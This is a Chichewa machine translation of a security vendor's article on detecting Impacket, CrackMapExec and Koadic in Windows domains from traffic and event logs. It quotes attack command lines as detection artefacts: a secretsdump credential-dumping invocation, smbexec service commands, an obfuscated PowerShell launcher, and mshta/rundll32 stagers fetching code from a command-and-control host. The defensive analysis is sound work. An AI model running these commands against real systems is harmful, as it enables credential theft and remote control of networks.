Pulogalamu ya ProHoster > Blog > Ulamuliro > Momwe mungadziwire kuukira kwa Windows zomangamanga: kuphunzira zida za hacker

Momwe mungadziwire kuukira kwa Windows zomangamanga: kuphunzira zida za hacker

Momwe mungadziwire kuukira kwa Windows zomangamanga: kuphunzira zida za hacker

Chiwerengero cha ziwawa m'magulu amakampani chikukula chaka chilichonse: mwachitsanzo mu 2017, 13% zina zapadera zinalembedwa kuposa mu 2016, ndipo kumapeto kwa 2018 - 27% zochitika zinakuposa nthawi yapitayi. Kuphatikizapo omwe chida chachikulu chogwirira ntchito ndi Windows. Mu 2017-2018, APT Dragonfly, APT28, APT MuddyWater anachita zigawenga pa maboma ndi mabungwe ankhondo ku Europe, North America ndi Saudi Arabia. Ndipo tidagwiritsa ntchito zida zitatu izi - Impacket, Chinthaka ΠΈ Kodi. Khodi yawo yoyambira ndi yotseguka ndipo ikupezeka pa GitHub.

Ndikoyenera kudziwa kuti zidazi sizigwiritsidwa ntchito polowera koyamba, koma kupanga kuwukira mkati mwazomangamanga. Owukira amawagwiritsa ntchito pazigawo zosiyanasiyana zowukira pambuyo polowa mozungulira. Izi, mwa njira, zimakhala zovuta kuzizindikira ndipo nthawi zambiri ndi chithandizo chaukadaulo kuzindikira zotsalira za kusagwirizana mu traffic traffic kapena zida zomwe zimalola zindikirani zochita za wowukirayo atalowa mnyumba. Zidazi zimapereka ntchito zosiyanasiyana, kuyambira kusamutsa mafayilo mpaka kuyanjana ndi registry ndikuchita malamulo pamakina akutali. Tidachita kafukufuku pazida izi kuti tidziwe zomwe akuchita pa intaneti.

Zomwe tidayenera kuchita:

  • Mvetserani momwe zida zowonongeka zimagwirira ntchito. Dziwani zomwe oukirawo akuyenera kugwiritsa ntchito komanso matekinoloje omwe angagwiritse ntchito.
  • Pezani zomwe sizikudziwika ndi zida zotetezera zidziwitso m'magawo oyamba akuwukira. Gawo lachidziwitso likhoza kudumpha, mwina chifukwa chakuti wowukirayo ndi wowukira mkati, kapena chifukwa wowukirayo akugwiritsa ntchito dzenje muzomangamanga zomwe sizinadziwike kale. Zimakhala zotheka kubwezeretsa unyolo wonse wa zochita zake, choncho chikhumbo chozindikira kusuntha kwina.
  • Chotsani zabwino zabodza pazida zozindikiritsa kulowerera. Sitiyenera kuiwala kuti pamene zochita zina zapezeka pamaziko a reconnaissance yekha, zolakwa pafupipafupi n'zotheka. Kawirikawiri muzomangamanga pali njira zokwanira, zosadziwika bwino ndi zovomerezeka poyang'ana koyamba, kuti mupeze chidziwitso chilichonse.

Kodi zida izi zimapereka chiyani kwa omwe akuukira? Ngati iyi ndi Impacket, ndiye kuti owukira amalandira laibulale yayikulu yama module omwe angagwiritsidwe ntchito pamagawo osiyanasiyana owukira omwe amatsatira atatha kuswa kozungulira. Zida zambiri zimagwiritsa ntchito ma module a Impacket mkati - mwachitsanzo, Metasploit. Ili ndi dcomexec ndi wmiexec pakukhazikitsa kwakutali, secretsdump kuti mupeze maakaunti pamtima omwe amawonjezedwa kuchokera ku Impacket. Chotsatira chake, kuzindikira kolondola kwa ntchito ya laibulale yotereyi kudzatsimikizira kuzindikiridwa kwa zotumphukira.

Sizinangochitika mwangozi kuti opanga adalemba "Powered by Impacket" za CrackMapExec (kapena CME chabe). Kuphatikiza apo, CME ili ndi magwiridwe antchito okonzeka pazochitika zodziwika bwino: Mimikatz popeza mapasiwedi kapena ma hesi awo, kukhazikitsa Meterpreter kapena Empire agent kuti aphedwe akutali, ndi Bloodhound m'bwalo.

Chida chachitatu chomwe tidasankha chinali Koadic. Zaposachedwa kwambiri, zidawonetsedwa pamsonkhano wapadziko lonse wa owononga DEFCON 25 mu 2017 ndipo amasiyanitsidwa ndi njira yosagwirizana: imagwira ntchito kudzera pa HTTP, Java Script ndi Microsoft Visual Basic Script (VBS). Njira iyi imatchedwa kukhala pa nthaka: chidachi chimagwiritsa ntchito zodalira ndi malaibulale omwe amamangidwa mu Windows. Ozipanga amachitcha COM Command & Control, kapena C3.

IMPACKET

Magwiridwe a Impacket ndi otakata kwambiri, kuyambira pakuzindikiranso mkati mwa AD ndikusonkhanitsa deta kuchokera ku maseva amkati a MS SQL, kupita ku njira zopezera zidziwitso: uku ndikuwukira kwa SMB, ndikupeza fayilo ya ntds.dit yokhala ndi mawu achinsinsi a ogwiritsa ntchito kuchokera kwa woyang'anira dera. Impacket imapanganso malamulo patali pogwiritsa ntchito njira zinayi zosiyanasiyana: WMI, Windows Scheduler Management Service, DCOM, ndi SMB, ndipo imafuna mbiri kuti itero.

Kutaya kwachinsinsi

Tiyeni tiwone zachinsinsi kutaya. Iyi ndi gawo lomwe lingayang'ane makina onse ogwiritsa ntchito komanso olamulira madomeni. Itha kugwiritsidwa ntchito kupeza makope a malo okumbukira LSA, SAM, SECURITY, NTDS.dit, kotero imatha kuwoneka pamagawo osiyanasiyana akuwukira. Gawo loyamba pakugwira ntchito kwa gawoli ndikutsimikizika kudzera pa SMB, zomwe zimafuna kuti achinsinsi a wogwiritsa ntchito kapena hashi yake achite zokha Kuwukira kwa Hash. Chotsatira pakubwera pempho loti mutsegule mwayi wa Service Control Manager (SCM) ndikupeza mwayi wolembetsa kudzera pa protocol ya winreg, pogwiritsa ntchito zomwe wotsutsa angapeze deta ya nthambi za chidwi ndikupeza zotsatira kudzera pa SMB.

Mku. 1 tikuwona momwe chimodzimodzi mukamagwiritsa ntchito protocol ya winreg, mwayi umapezeka pogwiritsa ntchito kiyi yolembetsa ndi LSA. Kuti muchite izi, gwiritsani ntchito lamulo la DCERPC ndi opcode 15 - OpenKey.

Momwe mungadziwire kuukira kwa Windows zomangamanga: kuphunzira zida za hacker
Mpunga. 1. Kutsegula kiyi ya registry pogwiritsa ntchito protocol ya winreg

Kenako, mwayi wa kiyi ukapezeka, zikhalidwe zimasungidwa ndi lamulo la SaveKey ndi opcode 20. Impacket imachita izi mwanjira yapadera kwambiri. Imasunga zikhalidwe ku fayilo yomwe dzina lake ndi mndandanda wa zilembo 8 zomwe zimaphatikizidwa ndi .tmp. Kuphatikiza apo, kukweza kwina kwa fayiloyi kumachitika kudzera pa SMB kuchokera ku System32 directory (mkuyu 2).

Momwe mungadziwire kuukira kwa Windows zomangamanga: kuphunzira zida za hacker
Mpunga. 2. Ndondomeko yopezera kiyi ya registry kuchokera pamakina akutali

Zikuoneka kuti ntchito yotereyi pa intaneti ikhoza kudziwika ndi mafunso ku nthambi zina zolembera pogwiritsa ntchito Winreg protocol, mayina enieni, malamulo ndi dongosolo lawo.

Module iyi imasiyanso zolemba mu chipika cha zochitika za Windows, zomwe zimapangitsa kuti zikhale zosavuta kuzizindikira. Mwachitsanzo, chifukwa chotsatira lamulo

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

Mu chipika cha Windows Server 2016 tiwona zochitika zotsatirazi:

1. 4624 - Logon yakutali.
2. 5145 - kuyang'ana ufulu wofikira ku ntchito yakutali ya winreg.
3. 5145 - kuyang'ana ufulu wofikira mafayilo mu chikwatu cha System32. Fayiloyo ili ndi dzina lachisawawa lomwe latchulidwa pamwambapa.
4. 4688 - kupanga njira ya cmd.exe yomwe imayambitsa vssadmin:

β€œC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - kupanga ndondomeko ndi lamulo:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - kupanga ndondomeko ndi lamulo:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - kupanga ndondomeko ndi lamulo:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

Monga zida zambiri zogwiritsa ntchito pambuyo pake, Impacket ili ndi ma module opangira malamulo patali. Tiyang'ana pa smbexec, yomwe imapereka chipolopolo cholumikizira pamakina akutali. Gawoli limafunikiranso kutsimikizika kudzera pa SMB, mwina ndi mawu achinsinsi kapena mawu achinsinsi. Mku. Mu Chithunzi 3 tikuwona chitsanzo cha momwe chida choterechi chimagwirira ntchito, pankhaniyi ndi cholumikizira cha administrator.

Momwe mungadziwire kuukira kwa Windows zomangamanga: kuphunzira zida za hacker
Mpunga. 3. Interactive smbexec kutonthoza

Gawo loyamba la smbexec mutatha kutsimikizika ndikutsegula SCM ndi lamulo la OpenSCManagerW (15). Funso ndilodziwika: gawo la MachineName ndi DUMMY.

Momwe mungadziwire kuukira kwa Windows zomangamanga: kuphunzira zida za hacker
Mpunga. 4. Pemphani kutsegula Service Control Manager

Kenako, ntchitoyi imapangidwa pogwiritsa ntchito lamulo la CreateServiceW (12). Pankhani ya smbexec, titha kuwona malingaliro ofanana nthawi zonse. Mku. 5 wobiriwira amawonetsa magawo osasinthika, chikasu chikuwonetsa zomwe wowukira angasinthe. N'zosavuta kuona kuti dzina la fayilo yomwe ingagwiritsidwe ntchito, chikwatu chake ndi fayilo yotulutsa ikhoza kusinthidwa, koma zina zonse zimakhala zovuta kwambiri kusintha popanda kusokoneza malingaliro a Impacket module.

Momwe mungadziwire kuukira kwa Windows zomangamanga: kuphunzira zida za hacker
Mpunga. 5. Pemphani kuti mupange ntchito pogwiritsa ntchito Service Control Manager

Smbexec imasiyanso zowoneka bwino mu chipika cha Windows. Mu chipika cha Windows Server 2016 cha chipolopolo cholumikizirana ndi lamulo la ipconfig, tiwona mndandanda wazinthu zotsatirazi:

1. 4697 - kukhazikitsa kwa ntchitoyo pamakina a wozunzidwayo:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - kulengedwa kwa ndondomeko ya cmd.exe ndi mfundo zochokera ku mfundo 1.
3. 5145 - kuyang'ana ufulu wofikira pa fayilo ya __output mu C$ directory.
4. 4697 - kukhazikitsa ntchito pa makina ozunzidwa.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - kulengedwa kwa ndondomeko ya cmd.exe ndi mfundo zochokera ku mfundo 4.
6. 5145 - kuyang'ana ufulu wofikira pa fayilo ya __output mu C$ directory.

Impacket ndiye maziko opangira zida zowukira. Imathandizira pafupifupi ma protocol onse muzinthu za Windows ndipo nthawi yomweyo imakhala ndi mawonekedwe ake. Nawa zopempha zenizeni za winreg, ndi kugwiritsa ntchito SCM API yokhala ndi mawonekedwe a lamulo, ndi mtundu wa dzina la fayilo, ndi gawo la SMB SYSTEM32.

Mtengo wa CRACKMAPEXEC

Chida cha CME chidapangidwa makamaka kuti chizisintha zochitika zomwe wowukira amayenera kuchita kuti apite patsogolo pa intaneti. Zimakulolani kuti mugwire ntchito limodzi ndi odziwika bwino a Empire agent ndi Meterpreter. Kuti apereke malamulo mobisa, CME ikhoza kuwasokoneza. Pogwiritsa ntchito Bloodhound (chida chodziwikiratu chosiyana), wowukira atha kusinthira kusaka kwa gawo loyang'anira domeni.

Bloodhound

Bloodhound, ngati chida choyimirira, amalola kuzindikira kwapamwamba mkati mwamaneti. Imasonkhanitsa zambiri za ogwiritsa ntchito, makina, magulu, magawo ndipo imaperekedwa ngati script PowerShell kapena fayilo ya binary. Ma protocol a LDAP kapena SMB amagwiritsidwa ntchito kusonkhanitsa zambiri. Gawo lophatikizira la CME limalola Bloodhound kutsitsidwa kumakina a wozunzidwayo, kuthamanga ndikulandila zomwe zasonkhanitsidwa pambuyo pa kuphedwa, potero zimatengera zochita mudongosolo ndikupangitsa kuti zisawonekere. Chipolopolo chojambula cha Bloodhound chimapereka zomwe zasonkhanitsidwa ngati ma graph, zomwe zimakulolani kuti mupeze njira yayifupi kwambiri kuchokera pamakina owukira kupita kwa woyang'anira dera.

Momwe mungadziwire kuukira kwa Windows zomangamanga: kuphunzira zida za hacker
Mpunga. 6. Mawonekedwe a Bloodhound

Kuti mugwiritse ntchito pamakina a wozunzidwayo, gawoli limapanga ntchito pogwiritsa ntchito ATSVC ndi SMB. ATSVC ndi mawonekedwe ogwirira ntchito ndi Windows Task Scheduler. CME imagwiritsa ntchito NetrJobAdd(1) ntchito yake kupanga ntchito pamaneti. Chitsanzo cha zomwe module ya CME imatumiza ikuwonetsedwa mkuyu. 7: Uku ndi kuyimba kwa cmd.exe ndi code yobisika mu mawonekedwe a mikangano mumtundu wa XML.

Momwe mungadziwire kuukira kwa Windows zomangamanga: kuphunzira zida za hacker
Chithunzi 7. Kupanga ntchito kudzera pa CME

Ntchitoyo itatumizidwa kuti iphedwe, makina a wozunzidwayo amayamba Bloodhound, ndipo izi zitha kuwoneka pamagalimoto. Gawoli limadziwika ndi mafunso a LDAP kuti apeze magulu okhazikika, mndandanda wa makina onse ndi ogwiritsa ntchito mu domain, ndikupeza zambiri zokhudza magawo ogwiritsira ntchito pogwiritsa ntchito pempho la SRVSVC NetSessEnum.

Momwe mungadziwire kuukira kwa Windows zomangamanga: kuphunzira zida za hacker
Mpunga. 8. Kupeza mndandanda wa magawo omwe akugwira ntchito kudzera pa SMB

Kuphatikiza apo, kuyambitsa Bloodhound pamakina ovutitsidwa ndi auditing wothandizidwa kumatsagana ndi chochitika chokhala ndi ID 4688 (kupanga njira) ndi dzina lantchito. Β«C:WindowsSystem32cmd.exeΒ». Chodziwika bwino pa izi ndi mfundo za mzere wolamula:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

Module ya enum_avproducts ndiyosangalatsa kwambiri pakuwona magwiridwe antchito ndi kukhazikitsa. WMI imakupatsani mwayi wogwiritsa ntchito chilankhulo cha mafunso cha WQL kuti mutenge zambiri kuchokera kuzinthu zosiyanasiyana za Windows, zomwe ndizomwe gawoli la CME limagwiritsa ntchito. Zimapanga mafunso ku AntiSpywareProduct ndi AntiМirusProduct makalasi okhudza zida zotetezera zomwe zimayikidwa pamakina a wozunzidwayo. Kuti mupeze deta yofunikira, gawoli limagwirizanitsa ndi rootSecurityCenter2 namespace, kenako limapanga funso la WQL ndikulandira yankho. Mku. Chithunzi 9 chikuwonetsa zomwe zili muzopempha ndi mayankho. Mu chitsanzo chathu, Windows Defender idapezeka.

Momwe mungadziwire kuukira kwa Windows zomangamanga: kuphunzira zida za hacker
Mpunga. 9. Ntchito zapaintaneti za gawo la enum_avproducts

Nthawi zambiri, kuwunika kwa WMI (Trace WMI-Activity), komwe mungapeze zambiri zothandiza zokhudzana ndi mafunso a WQL, kumatha kuzimitsidwa. Koma ngati itayatsidwa, ndiye kuti enum_avproducts script ikayendetsedwa, chochitika chomwe chili ndi ID 11 chidzasungidwa. Chidzakhala ndi dzina la wogwiritsa ntchito yemwe adatumiza pempholo ndi dzina mu rootSecurityCenter2 namespace.

Iliyonse ya ma module a CME inali ndi zakezake, kaya mafunso enieni a WQL kapena kupanga mtundu wina wa ntchito mu ndandanda ya ntchito yokhala ndi obfuscation ndi Bloodhound-enieni ntchito mu LDAP ndi SMB.

KOADIC

Chodziwika bwino cha Koadic ndikugwiritsa ntchito omasulira a JavaScript ndi VBScript omangidwa mu Windows. M'lingaliro limeneli, zikutsatira zomwe zikuchitika pamtunda - ndiye kuti, alibe zodalira zakunja ndipo amagwiritsa ntchito zida za Windows. Ichi ndi chida cha Full Command & Control (CnC), popeza pambuyo pa matenda "implant" imayikidwa pamakina, ndikulola kuti iziwongolera. Makina otere, m'mawu a Koadic, amatchedwa "zombie". Ngati pali mwayi wosakwanira wogwirira ntchito zonse kumbali ya wozunzidwayo, Koadic amatha kuwakweza pogwiritsa ntchito njira za UAC bypass (UAC bypass).

Momwe mungadziwire kuukira kwa Windows zomangamanga: kuphunzira zida za hacker
Mpunga. 10. Koadic Chipolopolo

Wozunzidwayo ayenera kuyambitsa kulumikizana ndi seva ya Command & Control. Kuti achite izi, ayenera kulumikizana ndi URI yokonzedwa kale ndikulandila gulu lalikulu la Koadic pogwiritsa ntchito imodzi mwama stagers. Mku. Chithunzi 11 chikuwonetsa chitsanzo cha mshta stager.

Momwe mungadziwire kuukira kwa Windows zomangamanga: kuphunzira zida za hacker
Mpunga. 11. Kuyambitsa gawo ndi seva ya CnC

Kutengera kuyankha kwa WS, zikuwonekeratu kuti kuphedwa kumachitika kudzera pa WScript.Shell, ndipo zosintha STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE zili ndi zambiri zokhudzana ndi magawo a gawoli. Ili ndiye pempho loyamba loyankha polumikizana ndi HTTP ndi seva ya CnC. Zopempha zotsatila zimagwirizana mwachindunji ndi magwiridwe antchito otchedwa ma modules (implants). Ma module onse a Koadic amagwira ntchito ndi gawo logwira ntchito ndi CnC.

Mimikatz

Monga CME imagwira ntchito ndi Bloodhound, Koadic amagwira ntchito ndi Mimikatz ngati pulogalamu yosiyana ndipo ali ndi njira zingapo zoyiyambitsa. Pansipa pali pempho-mayankhidwe awiri kuti mutsitse implant ya Mimikatz.

Momwe mungadziwire kuukira kwa Windows zomangamanga: kuphunzira zida za hacker
Mpunga. 12. Tumizani Mimikatz ku Koadic

Mutha kuwona momwe mtundu wa URI muzopempha wasinthira. Tsopano ili ndi mtengo wa csrf variable, yomwe ili ndi gawo losankhidwa. Osatengera dzina lake; Tonse tikudziwa kuti CSRF nthawi zambiri imamveka mosiyana. Yankho linali lofanana ndi thupi la Koadic, lomwe code yokhudzana ndi Mimikatz inawonjezeredwa. Ndi yaikulu ndithu, choncho tiyeni tione mfundo zofunika. Pano tili ndi laibulale ya Mimikatz yolembedwa mu base64, kalasi ya .NET yosakanikirana yomwe idzayilowetse, ndi zotsutsana zoyambitsa Mimikatz. Zotsatira zakupha zimatumizidwa pa netiweki m'mawu omveka bwino.

Momwe mungadziwire kuukira kwa Windows zomangamanga: kuphunzira zida za hacker
Mpunga. 13. Zotsatira zoyendetsa Mimikatz pa makina akutali

Exec_cmd

Koadic ilinso ndi ma module omwe amatha kutsata malamulo patali. Apa tiwona njira yofananira ya URI ndi mitundu yodziwika bwino ya sid ndi csrf. Pankhani ya exec_cmd module, code imawonjezeredwa ku thupi lomwe limatha kuchita malamulo a chipolopolo. Pansipa pali code yomwe ili mu mayankho a HTTP a seva ya CnC.

Momwe mungadziwire kuukira kwa Windows zomangamanga: kuphunzira zida za hacker
Mpunga. 14. Implant code exec_cmd

Kusintha kwa GAWTUUGCFI ndi mawonekedwe odziwika a WS ndikofunikira kuti mugwiritse ntchito ma code. Ndi chithandizo chake, implant imayitana chipolopolo, ndikukonza nthambi ziwiri za code - shell.exec ndi kubwerera kwa mtsinje wa deta ndi shell.run popanda kubwerera.

Koadic si chida chodziwika bwino, koma ili ndi zida zake zomwe zimatha kupezeka pamagalimoto ovomerezeka:

  • mapangidwe apadera a zopempha za HTTP,
  • pogwiritsa ntchito winHttpRequests API,
  • kupanga chinthu cha WScript.Shell kudzera pa ActiveXObject,
  • lalikulu executable thupi.

Kulumikizana koyamba kumayambitsidwa ndi stager, kotero ndizotheka kuzindikira ntchito yake kudzera muzochitika za Windows. Kwa mshta, ichi ndi chochitika 4688, chomwe chimasonyeza kulengedwa kwa ndondomeko ndi chiyambi:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Pomwe Koadic ikuyenda, mutha kuwona zochitika zina za 4688 zomwe zimadziwika bwino:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

anapezazo

Anthu ochita zachiwembu ayamba kutchuka pakati pa zigawenga. Amagwiritsa ntchito zida ndi njira zomangidwa mu Windows pazosowa zawo. Tikuwona zida zodziwika bwino za Koadic, CrackMapExec ndi Impacket kutsatira mfundoyi zikuwonekera kwambiri m'malipoti a APT. Chiwerengero cha mafoloko pa GitHub pazida izi chikukulanso, ndipo zatsopano zikuwonekera (pali kale pafupifupi chikwi tsopano). Zomwe zikuchitikazi zikutchuka chifukwa cha kuphweka kwake: owukira safuna zida za chipani chachitatu; ali kale pamakina a ozunzidwa ndikuwathandiza kudutsa njira zachitetezo. Timayang'ana kwambiri pakuwerenga kulumikizana kwapaintaneti: chida chilichonse chomwe tafotokoza pamwambapa chimasiya mawonekedwe ake mumayendedwe apa intaneti; kuphunzira mwatsatanetsatane za iwo anatilola kuphunzitsa mankhwala athu PT Network Attack Discovery kuwazindikira, zomwe zimathandiza kufufuza zochitika zonse za pa intaneti zomwe zimawakhudza.

olemba:

  • Anton Tyurin, Mtsogoleri wa Dipatimenti Yothandizira Katswiri, PT Expert Security Center, Positive Technologies
  • Egor Podmokov, katswiri, PT Expert Security Center, Positive Technologies

Source: www.habr.com

Kuwonjezera ndemanga